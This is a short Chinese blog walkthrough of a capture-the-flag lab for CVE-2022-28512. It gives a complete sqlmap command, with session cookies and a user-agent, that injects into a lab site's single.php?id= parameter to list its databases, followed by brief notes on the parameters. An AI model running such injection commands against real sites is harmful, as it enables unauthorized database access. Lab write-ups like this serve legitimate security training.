CVE-2022-28512 春秋云镜

1:先看提示
在这里插入图片描述

2:漏洞库https://www.cnnvd.org.cn/home/loophole
3:进入网页看看
在这里插入图片描述
在这里插入图片描述

4:直接sqlmap跑可以跑出来
python .\sqlmap.py -u “http://eci-2ze63b40kvqnrzqjdosu.cloudeci1.ichunqiu.com/single.php?id=1” --cookie=“chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=eaf57009faaa14d76925bd60ba2f6fdc0c5a1f8e; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669392458,1669451992,1669537355,1669548650; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669553861; __atuvc=8%7C48; __atuvs=638368249376658d007” --user-agent=“Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36” --batch –dbs
在这里插入图片描述

拓展知识
Cookie 跟user-agent在这里可以看到 头文件可以看到
在这里插入图片描述

Sqlmap的参数
–cookie:绕过身份验证
-user-agent:绕过客户端验证
-batch:默认y
分享一篇sqlmap的文章:https://blog.csdn.net/Gherbirthday0916/article/details/126857683?spm=1001.2101.3001.6650.2&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7ERate-2-126857683-blog-126019498.pc_relevant_3mothn_strategy_and_data_recovery&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7ERate-2-126857683-blog-126019498.pc_relevant_3mothn_strategy_and_data_recovery&utm_relevant_index=5

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值